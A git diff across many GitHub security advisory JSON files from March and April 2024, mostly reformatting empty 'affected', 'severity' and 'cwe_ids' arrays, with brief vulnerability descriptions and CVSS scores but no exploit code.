"ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-7wpm-78c8-xxqh/GHSA-7wpm-78c8-xxqh.json b/advisories/unreviewed/2024/03/GHSA-7wpm-78c8-xxqh/GHSA-7wpm-78c8-xxqh.json index 1483dd6014e..bf4b69e73b6 100644 --- a/advisories/unreviewed/2024/03/GHSA-7wpm-78c8-xxqh/GHSA-7wpm-78c8-xxqh.json +++ b/advisories/unreviewed/2024/03/GHSA-7wpm-78c8-xxqh/GHSA-7wpm-78c8-xxqh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-99qv-rxpj-q62m/GHSA-99qv-rxpj-q62m.json b/advisories/unreviewed/2024/03/GHSA-99qv-rxpj-q62m/GHSA-99qv-rxpj-q62m.json index 9ad21240507..018b623c8a3 100644 --- a/advisories/unreviewed/2024/03/GHSA-99qv-rxpj-q62m/GHSA-99qv-rxpj-q62m.json +++ b/advisories/unreviewed/2024/03/GHSA-99qv-rxpj-q62m/GHSA-99qv-rxpj-q62m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-c475-923p-gg3c/GHSA-c475-923p-gg3c.json b/advisories/unreviewed/2024/03/GHSA-c475-923p-gg3c/GHSA-c475-923p-gg3c.json index 979dc7cbf00..3ffa5d5c18e 100644 --- a/advisories/unreviewed/2024/03/GHSA-c475-923p-gg3c/GHSA-c475-923p-gg3c.json +++ b/advisories/unreviewed/2024/03/GHSA-c475-923p-gg3c/GHSA-c475-923p-gg3c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-c49c-7xhw-623r/GHSA-c49c-7xhw-623r.json b/advisories/unreviewed/2024/03/GHSA-c49c-7xhw-623r/GHSA-c49c-7xhw-623r.json index 3ab3aace840..2ee313359f7 100644 --- a/advisories/unreviewed/2024/03/GHSA-c49c-7xhw-623r/GHSA-c49c-7xhw-623r.json +++ b/advisories/unreviewed/2024/03/GHSA-c49c-7xhw-623r/GHSA-c49c-7xhw-623r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-ch65-8fj7-6r6x/GHSA-ch65-8fj7-6r6x.json b/advisories/unreviewed/2024/03/GHSA-ch65-8fj7-6r6x/GHSA-ch65-8fj7-6r6x.json index aec1a858ca4..f67f575bb81 100644 --- a/advisories/unreviewed/2024/03/GHSA-ch65-8fj7-6r6x/GHSA-ch65-8fj7-6r6x.json +++ b/advisories/unreviewed/2024/03/GHSA-ch65-8fj7-6r6x/GHSA-ch65-8fj7-6r6x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-cjxj-mgrm-h6pj/GHSA-cjxj-mgrm-h6pj.json b/advisories/unreviewed/2024/03/GHSA-cjxj-mgrm-h6pj/GHSA-cjxj-mgrm-h6pj.json index 59554cb68bc..36b4e15fd9a 100644 --- a/advisories/unreviewed/2024/03/GHSA-cjxj-mgrm-h6pj/GHSA-cjxj-mgrm-h6pj.json +++ b/advisories/unreviewed/2024/03/GHSA-cjxj-mgrm-h6pj/GHSA-cjxj-mgrm-h6pj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-fqjf-425c-q55w/GHSA-fqjf-425c-q55w.json b/advisories/unreviewed/2024/03/GHSA-fqjf-425c-q55w/GHSA-fqjf-425c-q55w.json index 79c124ddd08..042e22e11fb 100644 --- a/advisories/unreviewed/2024/03/GHSA-fqjf-425c-q55w/GHSA-fqjf-425c-q55w.json +++ b/advisories/unreviewed/2024/03/GHSA-fqjf-425c-q55w/GHSA-fqjf-425c-q55w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-g73g-2j83-vx95/GHSA-g73g-2j83-vx95.json b/advisories/unreviewed/2024/03/GHSA-g73g-2j83-vx95/GHSA-g73g-2j83-vx95.json index eaaab7519d2..7a99c94338e 100644 --- a/advisories/unreviewed/2024/03/GHSA-g73g-2j83-vx95/GHSA-g73g-2j83-vx95.json +++ b/advisories/unreviewed/2024/03/GHSA-g73g-2j83-vx95/GHSA-g73g-2j83-vx95.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-g7j3-wqpv-m97m/GHSA-g7j3-wqpv-m97m.json b/advisories/unreviewed/2024/03/GHSA-g7j3-wqpv-m97m/GHSA-g7j3-wqpv-m97m.json index b1852148363..5576619004b 100644 --- a/advisories/unreviewed/2024/03/GHSA-g7j3-wqpv-m97m/GHSA-g7j3-wqpv-m97m.json +++ b/advisories/unreviewed/2024/03/GHSA-g7j3-wqpv-m97m/GHSA-g7j3-wqpv-m97m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-gj95-32p3-vhr8/GHSA-gj95-32p3-vhr8.json b/advisories/unreviewed/2024/03/GHSA-gj95-32p3-vhr8/GHSA-gj95-32p3-vhr8.json index b03a6c294be..25cfb9a9f9f 100644 --- a/advisories/unreviewed/2024/03/GHSA-gj95-32p3-vhr8/GHSA-gj95-32p3-vhr8.json +++ b/advisories/unreviewed/2024/03/GHSA-gj95-32p3-vhr8/GHSA-gj95-32p3-vhr8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-gv6r-gxx4-rhjw/GHSA-gv6r-gxx4-rhjw.json b/advisories/unreviewed/2024/03/GHSA-gv6r-gxx4-rhjw/GHSA-gv6r-gxx4-rhjw.json index 8463e4ff251..eb5412b92bf 100644 --- a/advisories/unreviewed/2024/03/GHSA-gv6r-gxx4-rhjw/GHSA-gv6r-gxx4-rhjw.json +++ b/advisories/unreviewed/2024/03/GHSA-gv6r-gxx4-rhjw/GHSA-gv6r-gxx4-rhjw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-hpq4-fc7m-px2f/GHSA-hpq4-fc7m-px2f.json b/advisories/unreviewed/2024/03/GHSA-hpq4-fc7m-px2f/GHSA-hpq4-fc7m-px2f.json index 1e67775a52e..592ad7e411c 100644 --- a/advisories/unreviewed/2024/03/GHSA-hpq4-fc7m-px2f/GHSA-hpq4-fc7m-px2f.json +++ b/advisories/unreviewed/2024/03/GHSA-hpq4-fc7m-px2f/GHSA-hpq4-fc7m-px2f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-j35v-jw9h-2h3w/GHSA-j35v-jw9h-2h3w.json b/advisories/unreviewed/2024/03/GHSA-j35v-jw9h-2h3w/GHSA-j35v-jw9h-2h3w.json index b003cff40c2..091c176950c 100644 --- a/advisories/unreviewed/2024/03/GHSA-j35v-jw9h-2h3w/GHSA-j35v-jw9h-2h3w.json +++ b/advisories/unreviewed/2024/03/GHSA-j35v-jw9h-2h3w/GHSA-j35v-jw9h-2h3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-m74x-wfqr-f768/GHSA-m74x-wfqr-f768.json b/advisories/unreviewed/2024/03/GHSA-m74x-wfqr-f768/GHSA-m74x-wfqr-f768.json index 8718d4336cd..a401f01795e 100644 --- a/advisories/unreviewed/2024/03/GHSA-m74x-wfqr-f768/GHSA-m74x-wfqr-f768.json +++ b/advisories/unreviewed/2024/03/GHSA-m74x-wfqr-f768/GHSA-m74x-wfqr-f768.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-p97j-639r-983f/GHSA-p97j-639r-983f.json b/advisories/unreviewed/2024/03/GHSA-p97j-639r-983f/GHSA-p97j-639r-983f.json index 149c403b2fd..5f0c71699b8 100644 --- a/advisories/unreviewed/2024/03/GHSA-p97j-639r-983f/GHSA-p97j-639r-983f.json +++ b/advisories/unreviewed/2024/03/GHSA-p97j-639r-983f/GHSA-p97j-639r-983f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-q58f-q64h-6p4f/GHSA-q58f-q64h-6p4f.json b/advisories/unreviewed/2024/03/GHSA-q58f-q64h-6p4f/GHSA-q58f-q64h-6p4f.json index a8d1226a892..9dc810b3200 100644 --- a/advisories/unreviewed/2024/03/GHSA-q58f-q64h-6p4f/GHSA-q58f-q64h-6p4f.json +++ b/advisories/unreviewed/2024/03/GHSA-q58f-q64h-6p4f/GHSA-q58f-q64h-6p4f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-r2gp-p8p8-5p94/GHSA-r2gp-p8p8-5p94.json b/advisories/unreviewed/2024/03/GHSA-r2gp-p8p8-5p94/GHSA-r2gp-p8p8-5p94.json index 3d496d00ca9..3da6d6c0150 100644 --- a/advisories/unreviewed/2024/03/GHSA-r2gp-p8p8-5p94/GHSA-r2gp-p8p8-5p94.json +++ b/advisories/unreviewed/2024/03/GHSA-r2gp-p8p8-5p94/GHSA-r2gp-p8p8-5p94.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-r65q-qpw9-v3qf/GHSA-r65q-qpw9-v3qf.json b/advisories/unreviewed/2024/03/GHSA-r65q-qpw9-v3qf/GHSA-r65q-qpw9-v3qf.json index 63c7744a5e4..de1d796ca8d 100644 --- a/advisories/unreviewed/2024/03/GHSA-r65q-qpw9-v3qf/GHSA-r65q-qpw9-v3qf.json +++ b/advisories/unreviewed/2024/03/GHSA-r65q-qpw9-v3qf/GHSA-r65q-qpw9-v3qf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-rhx5-h5p6-9g65/GHSA-rhx5-h5p6-9g65.json b/advisories/unreviewed/2024/03/GHSA-rhx5-h5p6-9g65/GHSA-rhx5-h5p6-9g65.json index 180a8f0f575..12d771ef6eb 100644 --- a/advisories/unreviewed/2024/03/GHSA-rhx5-h5p6-9g65/GHSA-rhx5-h5p6-9g65.json +++ b/advisories/unreviewed/2024/03/GHSA-rhx5-h5p6-9g65/GHSA-rhx5-h5p6-9g65.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-vp29-fgg5-m92h/GHSA-vp29-fgg5-m92h.json b/advisories/unreviewed/2024/03/GHSA-vp29-fgg5-m92h/GHSA-vp29-fgg5-m92h.json index 32101818071..035a3d71e10 100644 --- a/advisories/unreviewed/2024/03/GHSA-vp29-fgg5-m92h/GHSA-vp29-fgg5-m92h.json +++ b/advisories/unreviewed/2024/03/GHSA-vp29-fgg5-m92h/GHSA-vp29-fgg5-m92h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-w576-x7c8-w498/GHSA-w576-x7c8-w498.json b/advisories/unreviewed/2024/03/GHSA-w576-x7c8-w498/GHSA-w576-x7c8-w498.json index 5844a48f3bd..ea7b490b87f 100644 --- a/advisories/unreviewed/2024/03/GHSA-w576-x7c8-w498/GHSA-w576-x7c8-w498.json +++ b/advisories/unreviewed/2024/03/GHSA-w576-x7c8-w498/GHSA-w576-x7c8-w498.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-w89m-878p-5xvm/GHSA-w89m-878p-5xvm.json b/advisories/unreviewed/2024/03/GHSA-w89m-878p-5xvm/GHSA-w89m-878p-5xvm.json index 0f443b112eb..5feaf68b7a1 100644 --- a/advisories/unreviewed/2024/03/GHSA-w89m-878p-5xvm/GHSA-w89m-878p-5xvm.json +++ b/advisories/unreviewed/2024/03/GHSA-w89m-878p-5xvm/GHSA-w89m-878p-5xvm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-x2qr-244g-56q9/GHSA-x2qr-244g-56q9.json b/advisories/unreviewed/2024/03/GHSA-x2qr-244g-56q9/GHSA-x2qr-244g-56q9.json index e94cce9bc47..fbaaec732d3 100644 --- a/advisories/unreviewed/2024/03/GHSA-x2qr-244g-56q9/GHSA-x2qr-244g-56q9.json +++ b/advisories/unreviewed/2024/03/GHSA-x2qr-244g-56q9/GHSA-x2qr-244g-56q9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-x4qx-c389-cj23/GHSA-x4qx-c389-cj23.json b/advisories/unreviewed/2024/03/GHSA-x4qx-c389-cj23/GHSA-x4qx-c389-cj23.json index 5b3c5034c78..625acc020b8 100644 --- a/advisories/unreviewed/2024/03/GHSA-x4qx-c389-cj23/GHSA-x4qx-c389-cj23.json +++ b/advisories/unreviewed/2024/03/GHSA-x4qx-c389-cj23/GHSA-x4qx-c389-cj23.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-x5p5-w4hp-mprx/GHSA-x5p5-w4hp-mprx.json b/advisories/unreviewed/2024/03/GHSA-x5p5-w4hp-mprx/GHSA-x5p5-w4hp-mprx.json index ec10e01b13d..8e4ba66edc2 100644 --- a/advisories/unreviewed/2024/03/GHSA-x5p5-w4hp-mprx/GHSA-x5p5-w4hp-mprx.json +++ b/advisories/unreviewed/2024/03/GHSA-x5p5-w4hp-mprx/GHSA-x5p5-w4hp-mprx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-26wq-535g-r2w5/GHSA-26wq-535g-r2w5.json b/advisories/unreviewed/2024/04/GHSA-26wq-535g-r2w5/GHSA-26wq-535g-r2w5.json index c258680e990..3c4e6983a21 100644 --- a/advisories/unreviewed/2024/04/GHSA-26wq-535g-r2w5/GHSA-26wq-535g-r2w5.json +++ b/advisories/unreviewed/2024/04/GHSA-26wq-535g-r2w5/GHSA-26wq-535g-r2w5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-2x3p-pww2-fg9r/GHSA-2x3p-pww2-fg9r.json b/advisories/unreviewed/2024/04/GHSA-2x3p-pww2-fg9r/GHSA-2x3p-pww2-fg9r.json index 43fbc53d399..609fceaa2fa 100644 --- a/advisories/unreviewed/2024/04/GHSA-2x3p-pww2-fg9r/GHSA-2x3p-pww2-fg9r.json +++ b/advisories/unreviewed/2024/04/GHSA-2x3p-pww2-fg9r/GHSA-2x3p-pww2-fg9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-3mvj-7p7p-x4x5/GHSA-3mvj-7p7p-x4x5.json b/advisories/unreviewed/2024/04/GHSA-3mvj-7p7p-x4x5/GHSA-3mvj-7p7p-x4x5.json index 6c7d6e4f781..4b259af4732 100644 --- a/advisories/unreviewed/2024/04/GHSA-3mvj-7p7p-x4x5/GHSA-3mvj-7p7p-x4x5.json +++ b/advisories/unreviewed/2024/04/GHSA-3mvj-7p7p-x4x5/GHSA-3mvj-7p7p-x4x5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-3rgj-2cjp-7vqf/GHSA-3rgj-2cjp-7vqf.json b/advisories/unreviewed/2024/04/GHSA-3rgj-2cjp-7vqf/GHSA-3rgj-2cjp-7vqf.json index 3288a86585b..cd705808179 100644 --- a/advisories/unreviewed/2024/04/GHSA-3rgj-2cjp-7vqf/GHSA-3rgj-2cjp-7vqf.json +++ b/advisories/unreviewed/2024/04/GHSA-3rgj-2cjp-7vqf/GHSA-3rgj-2cjp-7vqf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-4g69-rp74-jj24/GHSA-4g69-rp74-jj24.json b/advisories/unreviewed/2024/04/GHSA-4g69-rp74-jj24/GHSA-4g69-rp74-jj24.json index 0de42b9ed3e..09dc4873e0e 100644 --- a/advisories/unreviewed/2024/04/GHSA-4g69-rp74-jj24/GHSA-4g69-rp74-jj24.json +++ b/advisories/unreviewed/2024/04/GHSA-4g69-rp74-jj24/GHSA-4g69-rp74-jj24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json b/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json index 7e9a33a5380..91171748cdb 100644 --- a/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json +++ b/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-596j-m7rx-58pm/GHSA-596j-m7rx-58pm.json b/advisories/unreviewed/2024/04/GHSA-596j-m7rx-58pm/GHSA-596j-m7rx-58pm.json index 4a172359526..068edd87f41 100644 --- a/advisories/unreviewed/2024/04/GHSA-596j-m7rx-58pm/GHSA-596j-m7rx-58pm.json +++ b/advisories/unreviewed/2024/04/GHSA-596j-m7rx-58pm/GHSA-596j-m7rx-58pm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-5f9x-xph8-qhxf/GHSA-5f9x-xph8-qhxf.json b/advisories/unreviewed/2024/04/GHSA-5f9x-xph8-qhxf/GHSA-5f9x-xph8-qhxf.json index 09131c6e550..1d218ba809e 100644 --- a/advisories/unreviewed/2024/04/GHSA-5f9x-xph8-qhxf/GHSA-5f9x-xph8-qhxf.json +++ b/advisories/unreviewed/2024/04/GHSA-5f9x-xph8-qhxf/GHSA-5f9x-xph8-qhxf.json @@ -7,12 +7,8 @@ "CVE-2024-22718" ], "details": "Cross Site Scripting (XSS) vulnerability in Form Tools 3.1.1 allows attackers to run arbitrary code via the client_id parameter in the application URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-5rw8-2rrx-mf5m/GHSA-5rw8-2rrx-mf5m.json b/advisories/unreviewed/2024/04/GHSA-5rw8-2rrx-mf5m/GHSA-5rw8-2rrx-mf5m.json index 67f818252b5..c020cf33b28 100644 --- a/advisories/unreviewed/2024/04/GHSA-5rw8-2rrx-mf5m/GHSA-5rw8-2rrx-mf5m.json +++ b/advisories/unreviewed/2024/04/GHSA-5rw8-2rrx-mf5m/GHSA-5rw8-2rrx-mf5m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-5vpv-8mpr-5w3p/GHSA-5vpv-8mpr-5w3p.json b/advisories/unreviewed/2024/04/GHSA-5vpv-8mpr-5w3p/GHSA-5vpv-8mpr-5w3p.json index fb1166663cd..761e539a932 100644 --- a/advisories/unreviewed/2024/04/GHSA-5vpv-8mpr-5w3p/GHSA-5vpv-8mpr-5w3p.json +++ b/advisories/unreviewed/2024/04/GHSA-5vpv-8mpr-5w3p/GHSA-5vpv-8mpr-5w3p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-62rm-mh7j-gv7j/GHSA-62rm-mh7j-gv7j.json b/advisories/unreviewed/2024/04/GHSA-62rm-mh7j-gv7j/GHSA-62rm-mh7j-gv7j.json index 8dfc017a25c..5c852fcd675 100644 --- a/advisories/unreviewed/2024/04/GHSA-62rm-mh7j-gv7j/GHSA-62rm-mh7j-gv7j.json +++ b/advisories/unreviewed/2024/04/GHSA-62rm-mh7j-gv7j/GHSA-62rm-mh7j-gv7j.json @@ -7,12 +7,8 @@ "CVE-2024-30916" ], "details": "An issue was discovered in eProsima FastDDS v.2.14.0 and before, allows a local attacker to cause a denial of service (DoS) and obtain sensitive information via a crafted max_samples parameter in DurabilityService QoS component.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-64cr-7hgf-2vwv/GHSA-64cr-7hgf-2vwv.json b/advisories/unreviewed/2024/04/GHSA-64cr-7hgf-2vwv/GHSA-64cr-7hgf-2vwv.json index 8fb7d3d3d2c..60399203f00 100644 --- a/advisories/unreviewed/2024/04/GHSA-64cr-7hgf-2vwv/GHSA-64cr-7hgf-2vwv.json +++ b/advisories/unreviewed/2024/04/GHSA-64cr-7hgf-2vwv/GHSA-64cr-7hgf-2vwv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-6854-3fp5-fh9h/GHSA-6854-3fp5-fh9h.json b/advisories/unreviewed/2024/04/GHSA-6854-3fp5-fh9h/GHSA-6854-3fp5-fh9h.json index 9b67f2f31f2..4e12f331993 100644 --- a/advisories/unreviewed/2024/04/GHSA-6854-3fp5-fh9h/GHSA-6854-3fp5-fh9h.json +++ b/advisories/unreviewed/2024/04/GHSA-6854-3fp5-fh9h/GHSA-6854-3fp5-fh9h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json b/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json index 3758b603a41..db3d3453608 100644 --- a/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json +++ b/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-997p-pqq2-w5f5/GHSA-997p-pqq2-w5f5.json b/advisories/unreviewed/2024/04/GHSA-997p-pqq2-w5f5/GHSA-997p-pqq2-w5f5.json index 84fec124be9..c9f75a829a1 100644 --- a/advisories/unreviewed/2024/04/GHSA-997p-pqq2-w5f5/GHSA-997p-pqq2-w5f5.json +++ b/advisories/unreviewed/2024/04/GHSA-997p-pqq2-w5f5/GHSA-997p-pqq2-w5f5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-9x6r-r4jh-x967/GHSA-9x6r-r4jh-x967.json b/advisories/unreviewed/2024/04/GHSA-9x6r-r4jh-x967/GHSA-9x6r-r4jh-x967.json index e82f42fc38f..e8888e4585a 100644 --- a/advisories/unreviewed/2024/04/GHSA-9x6r-r4jh-x967/GHSA-9x6r-r4jh-x967.json +++ b/advisories/unreviewed/2024/04/GHSA-9x6r-r4jh-x967/GHSA-9x6r-r4jh-x967.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-c2wf-8j59-jjhc/GHSA-c2wf-8j59-jjhc.json b/advisories/unreviewed/2024/04/GHSA-c2wf-8j59-jjhc/GHSA-c2wf-8j59-jjhc.json index 08d4e8bb98a..24ae94cb616 100644 --- 